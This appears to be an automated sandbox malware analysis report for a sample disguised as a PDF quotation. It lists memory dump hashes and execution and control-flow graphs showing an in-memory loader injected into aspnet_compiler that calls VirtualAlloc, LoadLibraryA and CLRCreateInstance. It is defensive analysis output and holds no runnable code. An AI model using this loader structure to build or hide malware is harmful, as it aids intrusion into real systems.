                                                                • API String ID:
                                                                • Opcode ID: 3f6eca506653fb0cb03b50459f4c9dddf24dcf7af139ced579ace8d3d371ddef
                                                                • Instruction ID: 053604ca5a8713fa85b5fc7b5f5cd339bbb9af1b3af5be6b18c31ad2c34cc87a
                                                                • Opcode Fuzzy Hash: 3f6eca506653fb0cb03b50459f4c9dddf24dcf7af139ced579ace8d3d371ddef
                                                                • Instruction Fuzzy Hash: 62210422F2E95E8EFFB497A858312F97AD2EF4C719F0601B6D45CC30E2DD186B194681
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f325923b076ee86bcf1a214a21d2f9cbbef27492134b4c99f8014f84b8b8c07
                                                                • Instruction ID: 4a9895a8e33733c801d6e706f98f574406ebda4bc40ec3ac7c94437ab748728d
                                                                • Opcode Fuzzy Hash: 0f325923b076ee86bcf1a214a21d2f9cbbef27492134b4c99f8014f84b8b8c07
                                                                • Instruction Fuzzy Hash: EA210731B0D95F4EEF69EBA8A4606FE7BB0EF4A314F05017AC04CD71A6CE2465418790
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef07ab1c7ba21fd66b19e96dcad33c0d10e6a9a033b8e8d888a7b4bceadb8619
                                                                • Instruction ID: 063b6beec075774b685731fb3989c5e57508b4f5a8a7cfb98d5177e3ff17a2a3
                                                                • Opcode Fuzzy Hash: ef07ab1c7ba21fd66b19e96dcad33c0d10e6a9a033b8e8d888a7b4bceadb8619
                                                                • Instruction Fuzzy Hash: 19215E70E19A1E9FEFA0DF9888957E977B1FFA8301F504176D44CE3260CA346A818B90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09c6ab5fa460dd30cfd016b6b7cb081e9960bc1568f2414de306ceb5f519d74a
                                                                • Instruction ID: 4783bf9c4e0f5d5136f9bc1e5d3beb2ceeecd75854580d4a940422c7ba756b23
                                                                • Opcode Fuzzy Hash: 09c6ab5fa460dd30cfd016b6b7cb081e9960bc1568f2414de306ceb5f519d74a
                                                                • Instruction Fuzzy Hash: 6C01D472B0C9194FAB48BA9CB8169FC73D1EB99321B10017AE01ED31DBED19680343C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ac00019254bbc8ded96f8a3a22b77f88df7cbdf364d5f498b456da4ab8b6328
                                                                • Instruction ID: bf3b922eb4dc3cc49bc3b9d4559b952e0b45b1e5cfbfa1b140758d11ca11feae
                                                                • Opcode Fuzzy Hash: 2ac00019254bbc8ded96f8a3a22b77f88df7cbdf364d5f498b456da4ab8b6328
                                                                • Instruction Fuzzy Hash: 58114970A09A4D8FDB85EF68D869AE97BF0FF58305F040667E41DC31A1DA34A584CB81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 850dd3c3567b6a5160cae706aa67268b863e4939e7192873eb15bb8549dc1d9e
                                                                • Instruction ID: 479d4528f56eca080ada7ccdfd1bd33930e476b79bf027293afbac632ca467f7
                                                                • Opcode Fuzzy Hash: 850dd3c3567b6a5160cae706aa67268b863e4939e7192873eb15bb8549dc1d9e
                                                                • Instruction Fuzzy Hash: A8216430A15A1DCFDB64EFA8C4A56ACB7B2FF59301F51057DE409A32A1CB756D42CB40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05b085738c64efec05c55e6058a6ec64b0edf66c97d3eefe735c48f88d1287cd
                                                                • Instruction ID: 7a78634eb7d9d8e571500b5e0e3c88aa7bd6a5d2b71b399b2b9063c51fcb069e
                                                                • Opcode Fuzzy Hash: 05b085738c64efec05c55e6058a6ec64b0edf66c97d3eefe735c48f88d1287cd
                                                                • Instruction Fuzzy Hash: 91118B30A19A4D8FDF45EF68C859AE97BE0FF58305F0002A7E41DC31A2CB30A584CB80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ffc9648b7c47521676760cad71aa2df57336d876f87dfbee65485513eeec983e
                                                                • Instruction ID: 81bb68712a6099b93e1939df88bfd699acec2f37b03d72bb981b116d032e8785
                                                                • Opcode Fuzzy Hash: ffc9648b7c47521676760cad71aa2df57336d876f87dfbee65485513eeec983e
                                                                • Instruction Fuzzy Hash: 39215170E1991D9FEFA4DF98C8957A977B1FF58301F504179D40CA3260CB346A81CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93117c2fe3f2756d3ed326610dce733242809349ea8c2e5bbece757186ec4c1e
                                                                • Instruction ID: a2208759967fdeb13f3975d5900c4913c81e801c6de0fe6a59e50dbee2105a5b
                                                                • Opcode Fuzzy Hash: 93117c2fe3f2756d3ed326610dce733242809349ea8c2e5bbece757186ec4c1e
                                                                • Instruction Fuzzy Hash: 2E21F3B0E4A12E8AEB74EB54C9587E9B7B1EB98301F0142E9D04DA2291CB795B848F00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b1c4df3a0838844e2d9b86f81578aad5a4cafac600f6e51c2be14985fdc9244
                                                                • Instruction ID: 72a1b2a166de424573d97378ccda4d6a4dd0dc9a4b1f8b34f9a46a5cc55c137c
                                                                • Opcode Fuzzy Hash: 9b1c4df3a0838844e2d9b86f81578aad5a4cafac600f6e51c2be14985fdc9244
                                                                • Instruction Fuzzy Hash: 25010930918A1D8FDF94EF68C859AEA77F0FF68305F00066AE41DD32A1DB34A550CB81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5dcfccd5568c38dd580cb6a105d5075f3a496443e7e6173fc81a39ad1eb12531
                                                                • Instruction ID: b628e37243640a34c3f36d979fb0a4d40e872afc5eb463bc49aea9d7f7817dec
                                                                • Opcode Fuzzy Hash: 5dcfccd5568c38dd580cb6a105d5075f3a496443e7e6173fc81a39ad1eb12531
                                                                • Instruction Fuzzy Hash: E011E330A1660ECFDB68DF94C0A1AED7BB2EF59341F51013DE409A62A1CB796D81CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 66e6aa55c323539b05829450e72603e78d2f590cc36c70d0634593c02d296c2c
                                                                • Instruction ID: 063d7fcfdac90dfcee520fd80d3e73e604758cd1734c8b9445a68aa31e7bc4a3
                                                                • Opcode Fuzzy Hash: 66e6aa55c323539b05829450e72603e78d2f590cc36c70d0634593c02d296c2c
                                                                • Instruction Fuzzy Hash: 0B011E70E1951E9FEFA4DF98C8957AD77B1FF98301F51417AD00CA21A0CB386A81CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

                                                                Execution Graph

                                                                Execution Coverage:20.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:60
                                                                Total number of Limit Nodes:2
                                                                execution_graph 6140 1904eee279c 6141 1904eee27c5 6140->6141 6142 1904eee2800 VirtualAlloc 6141->6142 6153 1904eee2819 6141->6153 6143 1904eee2845 6142->6143 6142->6153 6145 1904eee2910 6143->6145 6143->6153 6155 1904eee3fb4 6143->6155 6145->6153 6154 1904eee29c7 6145->6154 6167 1904eee1704 6145->6167 6147 1904eee29ae 6147->6153 6174 1904eee1830 6147->6174 6148 1904eee2ae9 6179 1904eee2fa8 6148->6179 6149 1904eee2a99 6149->6153 6159 1904eee2528 6149->6159 6154->6148 6154->6149 6154->6153 6158 1904eee3fd2 6155->6158 6156 1904eee407d LoadLibraryA 6157 1904eee4085 6156->6157 6157->6143 6158->6156 6158->6157 6160 1904eee2565 CLRCreateInstance 6159->6160 6163 1904eee257e 6159->6163 6160->6163 6162 1904eee262d 6162->6153 6163->6162 6164 1904eee268b SysAllocString 6163->6164 6165 1904eee265f 6163->6165 6164->6165 6165->6162 6165->6165 6166 1904eee2771 SafeArrayDestroy 6165->6166 6166->6162 6168 1904eee3fb4 LoadLibraryA 6167->6168 6169 1904eee1723 6168->6169 6170 1904eee172b 6169->6170 6189 1904eee409c 6169->6189 6170->6147 6172 1904eee174a 6172->6170 6173 1904eee409c LoadLibraryA 6172->6173 6173->6170 6175 1904eee3fb4 LoadLibraryA 6174->6175 6176 1904eee184e 6175->6176 6177 1904eee409c LoadLibraryA 6176->6177 6178 1904eee1863 6177->6178 6178->6154 6183 1904eee2ffc 6179->6183 6180 1904eee3fb4 LoadLibraryA 6180->6183 6181 1904eee3fb4 LoadLibraryA 6182 1904eee3459 6181->6182 6182->6181 6185 1904eee409c LoadLibraryA 6182->6185 6186 1904eee34f8 6182->6186 6183->6180 6183->6182 6184 1904eee409c LoadLibraryA 6183->6184 6187 1904eee3830 6183->6187 6184->6183 6185->6182 6186->6187 6199 1904eee3d58 6186->6199 6187->6153 6190 1904eee40d2 6189->6190 6192 1904eee420c 6189->6192 6190->6192 6193 1904eee1f08 6190->6193 6192->6172 6194 1904eee1f74 6193->6194 6196 1904eee1f4b 6193->6196 6195 1904eee1f84 6194->6195 6197 1904eee3fb4 LoadLibraryA 6194->6197 6195->6192 6196->6194 6196->6195 6198 1904eee409c LoadLibraryA 6196->6198 
6197->6195 6198->6196 6201 1904eee3d94 6199->6201 6200 1904eee3f90 6200->6187 6201->6200 6202 1904eee409c LoadLibraryA 6201->6202 6202->6201 6203 1904eee2566 CLRCreateInstance 6204 1904eee257e 6203->6204 6205 1904eee262d 6204->6205 6206 1904eee268b SysAllocString 6204->6206 6207 1904eee265f 6204->6207 6206->6207 6207->6205 6207->6207 6208 1904eee2771 SafeArrayDestroy 6207->6208 6208->6205

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 53 1904eee279c-1904eee27f4 call 1904eee4244 * 3 60 1904eee2826 53->60 61 1904eee27f6-1904eee27f9 53->61 63 1904eee2829-1904eee2844 60->63 61->60 62 1904eee27fb-1904eee27fe 61->62 62->60 64 1904eee2800-1904eee2817 VirtualAlloc 62->64 65 1904eee2819-1904eee2820 64->65 66 1904eee2845-1904eee286e call 1904eee47c4 call 1904eee47e4 64->66 65->60 67 1904eee2822 65->67 72 1904eee28aa-1904eee28c0 call 1904eee4244 66->72 73 1904eee2870-1904eee28a4 call 1904eee43f8 call 1904eee42b8 66->73 67->60 72->60 79 1904eee28c6-1904eee28c7 72->79 73->72 82 1904eee2aff-1904eee2b00 73->82 81 1904eee28cd-1904eee28d3 79->81 83 1904eee28d5 81->83 84 1904eee2910-1904eee291b 81->84 87 1904eee2b05-1904eee2b16 82->87 88 1904eee28d7-1904eee28d9 83->88 85 1904eee291d-1904eee2937 call 1904eee4244 84->85 86 1904eee2950-1904eee2959 84->86 104 1904eee2939-1904eee2940 85->104 105 1904eee2946-1904eee294e 85->105 90 1904eee297a-1904eee2983 86->90 91 1904eee295b-1904eee296b call 1904eee18c0 86->91 92 1904eee2b18-1904eee2b22 87->92 93 1904eee2b49-1904eee2b6a call 1904eee47e4 87->93 94 1904eee28db-1904eee28e1 88->94 95 1904eee28f2-1904eee28f4 88->95 90->87 101 1904eee2989-1904eee2993 90->101 91->87 111 1904eee2971-1904eee2978 91->111 92->93 99 1904eee2b24-1904eee2b42 call 1904eee47e4 92->99 121 1904eee2b6c 93->121 122 1904eee2b70-1904eee2b72 93->122 94->95 100 1904eee28e3-1904eee28f0 94->100 95->84 102 1904eee28f6-1904eee2909 call 1904eee3fb4 95->102 99->93 100->88 100->95 108 1904eee299d-1904eee29a4 101->108 109 1904eee2995-1904eee2996 101->109 115 1904eee290e 102->115 104->82 104->105 105->85 105->86 113 1904eee29d8-1904eee29dc 108->113 114 1904eee29a6-1904eee29b0 call 1904eee1704 108->114 109->108 111->108 117 1904eee2a8f-1904eee2a97 113->117 118 1904eee29e2-1904eee2a0b 113->118 126 1904eee29bf-1904eee29c9 call 1904eee1830 114->126 127 1904eee29b2-1904eee29b9 114->127 115->81 123 1904eee2ae9-1904eee2aef call 1904eee2fa8 
117->123 124 1904eee2a99-1904eee2a9f 117->124 118->87 135 1904eee2a11-1904eee2a2b call 1904eee47c4 118->135 121->122 122->63 133 1904eee2af4-1904eee2afb 123->133 129 1904eee2ab6-1904eee2ac8 call 1904eee2528 124->129 130 1904eee2aa1-1904eee2aa7 124->130 126->113 142 1904eee29cb-1904eee29d2 126->142 127->87 127->126 145 1904eee2ada-1904eee2ae7 call 1904eee1fb8 129->145 146 1904eee2aca-1904eee2ad5 call 1904eee2b78 129->146 130->133 134 1904eee2aa9-1904eee2ab4 call 1904eee3a5c 130->134 133->87 138 1904eee2afd 133->138 134->133 148 1904eee2a2d-1904eee2a30 135->148 149 1904eee2a47-1904eee2a8a 135->149 138->138 142->87 142->113 145->133 146->145 148->117 152 1904eee2a32-1904eee2a45 call 1904eee4548 148->152 149->87 156 1904eee2a8c-1904eee2a8d 149->156 152->156 156->117
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                • Instruction ID: dd1cb5c940b63808c13d6d0cbf18f1b0d2f06817f805f8b820ebfca73b92982b
                                                                • Opcode Fuzzy Hash: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                • Instruction Fuzzy Hash: C2C16430618909CFEB6AEE2E84A57E9B3D1FB9C300F140679D54AC7286DB25FD42C781

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                • String ID:
                                                                • API String ID: 815377780-0
                                                                • Opcode ID: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                • Instruction ID: 4ae814a7884b527d123eff961fa505a380a7e3e99d34a18d4aebc154144f6c76
                                                                • Opcode Fuzzy Hash: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
                                                                • Instruction Fuzzy Hash: 30716B30218A09CFDB69EF39D899BA6B7E0FF99301F104669959BC7151DB30F905CB82

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID: l
                                                                • API String ID: 1029625771-2517025534
                                                                • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                • Instruction ID: 6fa10ca796e8dc77b4f07fab4e5e9a61b5ec9a2be382e2b7c6ef927dc04ed97f
                                                                • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                • Instruction Fuzzy Hash: AA31A33051CA858FE75AEB2DC054B62BBD4FBA9308F2456BDC1CAC7296D720DC068742

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 157 1904eee2528-1904eee255f 158 1904eee25ff-1904eee2606 157->158 159 1904eee2565 157->159 160 1904eee2608-1904eee2621 158->160 161 1904eee2629-1904eee262b 158->161 162 1904eee2566-1904eee2578 CLRCreateInstance 159->162 160->161 165 1904eee263d-1904eee2642 161->165 166 1904eee262d-1904eee2633 161->166 163 1904eee257e-1904eee2597 162->163 164 1904eee2638-1904eee263b 162->164 168 1904eee259c-1904eee25b3 163->168 164->160 169 1904eee2647-1904eee2649 165->169 167 1904eee277d-1904eee2798 166->167 172 1904eee25b8-1904eee25ba 168->172 170 1904eee264f-1904eee265d 169->170 171 1904eee277a-1904eee277b 169->171 173 1904eee265f-1904eee266f 170->173 174 1904eee2671-1904eee2686 170->174 171->167 175 1904eee25bc-1904eee25cf 172->175 176 1904eee25f8-1904eee25f9 172->176 181 1904eee26b9-1904eee26bc 173->181 177 1904eee268b-1904eee26a9 SysAllocString 174->177 175->160 184 1904eee25d1-1904eee25d9 175->184 178 1904eee25fb-1904eee25fd 176->178 182 1904eee26ad-1904eee26b1 177->182 178->158 178->160 181->171 183 1904eee26c2-1904eee26d7 181->183 182->181 183->171 187 1904eee26dd-1904eee270e 183->187 184->178 185 1904eee25db-1904eee25f1 184->185 188 1904eee25f6 185->188 187->171 190 1904eee2710-1904eee271c 187->190 188->178 191 1904eee271e-1904eee2731 190->191 192 1904eee2733-1904eee273f 190->192 191->191 191->192 193 1904eee2747-1904eee2759 192->193 194 1904eee275b-1904eee276f 193->194 195 1904eee2771-1904eee2774 SafeArrayDestroy 193->195 194->194 194->195 195->171
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                • String ID:
                                                                • API String ID: 815377780-0
                                                                • Opcode ID: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                • Instruction ID: 65ef5aea35417a05071931abc977fcb733043f3d29eae350be93ba8efedfdcc0
                                                                • Opcode Fuzzy Hash: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                • Instruction Fuzzy Hash: F441813121CE098FD758EF29D895AE6B3E4FB99314F00462ED58BC7051EB31E9058BC2

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ec18ac12f7fcd2bb63787134b9b4b1de71669aa9259344ea5ababde75dbcddeb
                                                                • Instruction ID: d905e2c8469ba1d01166f087a97e070e398e29144e2cc4e1652caad9ffcbc4c2
                                                                • Opcode Fuzzy Hash: ec18ac12f7fcd2bb63787134b9b4b1de71669aa9259344ea5ababde75dbcddeb
                                                                • Instruction Fuzzy Hash: B0913B36B1D259DEE725ABACF825AEC77A0EF41328F044177D05DCB0E7DE28254A8790

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 296 7ffd9b963952-7ffd9b963959 297 7ffd9b96395c-7ffd9b963988 296->297 298 7ffd9b96395b 296->298 299 7ffd9b96398a-7ffd9b9639bf 297->299 300 7ffd9b963925-7ffd9b96394c 297->300 298->297 303 7ffd9b9639c1 299->303 304 7ffd9b9639c6-7ffd9b963a22 299->304 303->304 307 7ffd9b963a24-7ffd9b963a42 304->307 308 7ffd9b963a6c-7ffd9b963ab7 304->308 307->308 311 7ffd9b963abe-7ffd9b963b13 308->311 312 7ffd9b963ab9 308->312 313 7ffd9b963b1e-7ffd9b963b30 311->313 312->311 314 7ffd9b963b32 313->314 315 7ffd9b963b37-7ffd9b963b41 313->315 314->315 316 7ffd9b963b43-7ffd9b963b44 315->316 317 7ffd9b963b46-7ffd9b963b50 315->317 320 7ffd9b963b76-7ffd9b963be0 316->320 318 7ffd9b963b52 317->318 319 7ffd9b963b57-7ffd9b963b73 317->319 318->319 319->320 325 7ffd9b963c3e-7ffd9b963c67 320->325 327 7ffd9b963be2-7ffd9b963c3d 325->327 328 7ffd9b963c6d-7ffd9b963c8e call 7ffd9b963c8f 325->328 327->325
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da65fa37baaa2bb7e7f7d44cfeab1503e5e2b8a99b7218b7cd1cafd5ef774063
                                                                • Instruction ID: 4cb58700d685c073fb1de7b31a540537325a4d1841891567f83b6ae720e371fb
                                                                • Opcode Fuzzy Hash: da65fa37baaa2bb7e7f7d44cfeab1503e5e2b8a99b7218b7cd1cafd5ef774063
                                                                • Instruction Fuzzy Hash: E4B1BF70A0DA4D9FDB95DB68C865BA8BBF0FF59300F0141EED04DD72A2DA389981CB01

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f21af632e19d0a2b14eea829aefac6cf85c9dc5da92fade17735c6309acd02a
                                                                • Instruction ID: 10a07c2027abcb97acd8d99f8cfff45c7c44dfbe2ab63e200f2b31723619ea1c
                                                                • Opcode Fuzzy Hash: 1f21af632e19d0a2b14eea829aefac6cf85c9dc5da92fade17735c6309acd02a
                                                                • Instruction Fuzzy Hash: 8B615751EBF15FAEE23633A865FE5FA2740DF43714F87AD72E05D4A0E78C88A6094190





                                                                • Instruction Fuzzy Hash: 2D61D730E1951E9FDBA8DBA8C4A4BEDB7B1FF59305F5041A9D00DA3291CA386A81CF54
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1fa920df7fad9a19c9f7c9c3265949ee948ae2ecff55ecbb4b0d220673924391
                                                                • Instruction ID: 1437fd83bde54673f6959258d1fbe68f805f455bb3f037a6db91876ecd3ef4db
                                                                • Opcode Fuzzy Hash: 1fa920df7fad9a19c9f7c9c3265949ee948ae2ecff55ecbb4b0d220673924391
                                                                • Instruction Fuzzy Hash: E0513C70A1D65D9FDB98DB68C465BA8BBF1FF69300F4141EED04DD72A2DA346980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a20cb28f93ceda1e0e6515aaada675a5e8a828cf14c2955e7b54d0dce3b2f0e5
                                                                • Instruction ID: 3410da6c4f64918c88cdd3e02d8366e3eab3a93037bf07ace9f26e8b79ad3d1d
                                                                • Opcode Fuzzy Hash: a20cb28f93ceda1e0e6515aaada675a5e8a828cf14c2955e7b54d0dce3b2f0e5
                                                                • Instruction Fuzzy Hash: 37513A70A1DA5D9FDB98DBA8C465BA8BBF1FF69300F5040AED05DD72A1CA346980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb65ba481af5cef63f638559dc6dad6c9888810b2a5ef4237ffecf68f5ddbf9d
                                                                • Instruction ID: 02678ea4ccce981a89155861273b933888e10155fdcf3d8a1234983e53a95383
                                                                • Opcode Fuzzy Hash: bb65ba481af5cef63f638559dc6dad6c9888810b2a5ef4237ffecf68f5ddbf9d
                                                                • Instruction Fuzzy Hash: FF511C70A1DA5D9FDB98EB68C465BADBBF1FF69300F5041EAD04DD72A1CA346980CB01
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8ce70fffb7ab615650fc67c17d250c5dbba090dbf2f8d65e81da9c895046ab1
                                                                • Instruction ID: e044fa2eb7b9aa7d4e40a88b917b8b73860f42f2fa93e62d4f85eb846799af9f
